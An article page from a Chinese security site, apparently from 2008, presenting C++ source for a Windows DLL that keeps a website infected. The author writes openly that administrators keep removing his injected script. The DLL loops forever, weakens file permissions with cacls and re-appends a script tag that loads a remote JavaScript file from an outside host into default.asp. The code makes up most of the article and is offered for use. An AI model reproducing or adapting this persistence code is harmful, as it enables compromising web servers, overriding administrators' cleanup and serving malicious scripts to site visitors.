通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 爱心红客 电信网通铁通移动 在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 安全防御 >> 安全相关 >> 文章正文
简单监控文件挂马程序制作
责任编辑:酷酷の鱼   更新日期:2008-6-11
 

来源:安全中国

本人挂马语句经常被管理员KILL,但是自己也有管理员权限,保留的很好,既然被他发现了,怎么说我们也要强行挂上1天到2天,让他去重做系统去。下面是一个简单的监控某个文件,给予他访问的权限。然后在检查代码中有无我们事先插入的代码,没的话就插入,有的话,等等在

  代码如下:

#include "stdafx.h"
#include "process.h"
#include "windows.h"
#include "string.h"
#include "iostream.h"
#include "fstream.h"
char path2[256]="E:\\gxm\\default.asp";
char guama[256]="\n<script language=javascript src='http://www.gxm520.cn/tg.js'></script>";
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                                         )
{
        switch ( ul_reason_for_call )
        {
                case DLL_PROCESS_ATTACH:
                {
                        while(1)
        {
ifstream ifs(path2);
char FileContent[5000];
memset(FileContent,0,5000);//初始化FileContent
ifs.read(FileContent,5000);//读取数据
ifs.close();//关闭ifstream对像
if(strstr(FileContent,guama)==0)
{
    char path1[256]="E:\\gxm\\default.asp ";      //比变量path2多了一个空格
        char mingling[256]="cacls ";
    strcat(mingling,path1);
    char ps[25]="/T /E /C /G everyone:F";
        strcat(mingling,ps);
    char mingling1[256]="cacls ";
        strcat(mingling1,path1);
        char pa[30]="/T /E /C /G administrator:F";
    strcat(mingling1,pa);
        system(mingling);
    system(mingling1);
        SetFileAttributes(path2,GetFileAttributes(path1) & ~FILE_ATTRIBUTE_READONLY);
    ofstream outfile;
        outfile.open(path2,ios::app);
        if (!outfile)
        {
                exit(0);
        }
outfile<<guama;
outfile.close();
}
Sleep(9000);
        }
                }
                default:
                        return TRUE;
        }        
        return TRUE;
}

  简单的监控文件程序的代码而已,我也不知道别人是怎么写的,反正自己是这样想出来一点一点的写点,希望对我们一样菜的人有点帮助。

  • 上一篇文章:
  • 下一篇文章:
  • 最近更新
    固顶文章 黑鹰科技为震灾地区捐款万元
    普通文章 瑞星公司06月11日发布 每日计算机病毒及木马播报
    普通文章 警惕网页隐形代码 防范五种杀手
    普通文章 识破骗术:区别假冒腾讯网站
    推荐文章 还我清净 三招两式抵制IE顽固病毒
    普通文章 安全配置和维护Apache WEB Server
    普通文章 分解后门查核心——打造杀毒软件PASS的后门
    普通文章 删除U盘顽固病毒 还Linux一个清静空间
    普通文章 简单监控文件挂马程序制作
    普通文章 微软将修复Windows和IE严重漏洞
    热门文章
    普通文章陕西省地震局被入侵 黑客发虚假信息
    普通文章互联网恐遭“数字911”
    普通文章荷兰垃圾邮件引起环保组织担忧
    普通文章摩托罗拉Razr手机可执行恶意代码
    普通文章多种病毒借Flash插件传播
    普通文章美国政府及军方对网络安全采取的政策措施
    普通文章德国电信窃听公司高管电话通讯
    普通文章蠕虫借U盘肆虐 欲关闭杀毒软件和安全工具
    普通文章教你远离IE浏览器漏洞 避免遭黑客攻击
    普通文章曝光:黑客如何查找互联网网络安全漏洞
    精彩专题